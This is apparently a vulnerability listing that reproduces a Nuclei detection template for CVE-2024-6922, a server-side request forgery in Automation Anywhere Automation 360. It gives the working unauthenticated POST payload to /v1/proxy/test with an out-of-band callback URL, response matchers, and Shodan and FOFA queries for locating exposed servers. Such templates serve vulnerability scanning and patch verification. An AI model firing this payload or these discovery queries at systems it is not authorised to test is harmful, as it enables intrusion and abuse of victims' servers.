漏洞描述
Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.
CVE-2024-6922: Automation Anywhere Automation 360 - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2024-6922
info:
name: Automation Anywhere Automation 360 - Server-Side Request Forgery
author: DhiyaneshDK
severity: high
description: |
Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.
reference:
- https://www.automationanywhere.com/products/automation-360
- https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6922
classification:
epss-score: 0.35587
epss-percentile: 0.96945
cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1005691603
fofa-query: icon_hash="-1005691603"
product: automation_360
vendor: automationanywhere
tags: cve,cve2024,ssrf,oast,automation,anywhere,vuln
http:
- raw:
- |
POST /v1/proxy/test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"saasUrl":"{{interactsh-url}}/?param=one#"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '{"message":'
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 400
# digest: 490a0046304402205e9c9f0232445c5180b495d34ac42c6fbfb315df2283a1310ffd7690869ceda0022075b623f9c2b76161252ca761ae871d6adb0c53cbc5f1f855d40626c59b598fd7:922c64590222798bb761d5b6d8e72950